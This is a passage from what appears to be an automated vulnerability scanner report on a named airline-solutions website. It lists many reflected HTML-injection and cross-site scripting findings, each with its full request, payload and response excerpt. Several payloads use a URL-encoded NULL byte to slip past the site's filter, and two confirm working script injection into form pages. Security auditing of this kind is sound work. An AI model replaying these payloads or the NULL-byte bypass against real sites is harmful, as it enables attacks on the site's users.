NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/product_support_and_services?%0059a0b<a>b4a625dc95a=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>b4a625dc95a=1">product support and services?%0059a0b<a>b4a625dc95a=1</a> ...[SNIP]...
3.75. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/product_support_and_services/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00c2a4b<a>8c093d8e894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2a4b<a>8c093d8e894 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/product_support_and_services/?%00c2a4b<a>8c093d8e894=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>8c093d8e894=1">?%00c2a4b<a>8c093d8e894=1</a> ...[SNIP]...
3.76. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/product_support_and_services/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0072aaa"><a>a86720643c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72aaa"><a>a86720643c4 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/product_support_and_services/?%0072aaa"><a>a86720643c4=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/product_support_and_services/?%0072aaa"><a>a86720643c4=1"> ...[SNIP]...
3.77. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/sabre_holdings_corporation
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00f3b04<a>52fec2027bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3b04<a>52fec2027bf in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/sabre_holdings_corporation?%00f3b04<a>52fec2027bf=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321510; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>52fec2027bf=1">sabre holdings corporation?%00f3b04<a>52fec2027bf=1</a> ...[SNIP]...
3.78. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/sabre_holdings_corporation
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009e7cd"><a>c340023f0cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e7cd"><a>c340023f0cc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/sabre_holdings_corporation?%009e7cd"><a>c340023f0cc=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321510; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/sabre_holdings_corporation?%009e7cd"><a>c340023f0cc=1"> ...[SNIP]...
3.79. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/sabre_holdings_corporation/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001509d"><a>ced17157749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1509d"><a>ced17157749 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/sabre_holdings_corporation/?%001509d"><a>ced17157749=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321465; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/sabre_holdings_corporation/?%001509d"><a>ced17157749=1"> ...[SNIP]...
3.80. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/sabre_holdings_corporation/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %006b56e<a>b10196b1995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b56e<a>b10196b1995 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/sabre_holdings_corporation/?%006b56e<a>b10196b1995=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321465; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ada1d"><a>e10d4d698c6 was submitted in the height parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_adi?iframe=true&width=500&height=500ada1d"><a>e10d4d698c6 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airports Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;
The value of the iframe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b58"><a>cadaafccb73 was submitted in the iframe parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_adi?iframe=true10b58"><a>cadaafccb73&width=500&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airports Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <input type="hidden" name="page" value="/home/includes/form_adi?iframe=true10b58"><a>cadaafccb73&width=500&height=500" /> ...[SNIP]...
3.83. http://www.sabreairlinesolutions.com/home/includes/form_adi [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sabreairlinesolutions.com
Path:
/home/includes/form_adi
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5014"><script>alert(1)</script>0d3bc32002f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5014"><script>alert(1)</script>0d3bc32002f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/includes/form_adi?%00b5014"><script>alert(1)</script>0d3bc32002f=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D;
The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 658b6"><a>f616cacc2b9 was submitted in the width parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_adi?iframe=true&width=500658b6"><a>f616cacc2b9&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airports Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;
The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb7e1"><a>30ed8f77953 was submitted in the height parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_demo?iframe=true&width=500&height=500eb7e1"><a>30ed8f77953 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airports Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A44%3A%22%2Fproducts_services%2Fgds_electronic_ticketing%2F%22%3B%7D;
The value of the iframe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee410"><a>29ae69a2159 was submitted in the iframe parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_demo?iframe=trueee410"><a>29ae69a2159&width=500&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airports Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A44%3A%22%2Fproducts_services%2Fgds_electronic_ticketing%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <input type="hidden" name="page" value="/home/includes/form_demo?iframe=trueee410"><a>29ae69a2159&width=500&height=500" /> ...[SNIP]...
3.87. http://www.sabreairlinesolutions.com/home/includes/form_demo [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sabreairlinesolutions.com
Path:
/home/includes/form_demo
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0080885"><script>alert(1)</script>abc23bad94c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80885"><script>alert(1)</script>abc23bad94c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/includes/form_demo?%0080885"><script>alert(1)</script>abc23bad94c=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322635; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D;
The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ab88"><a>1c96e65d21 was submitted in the width parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
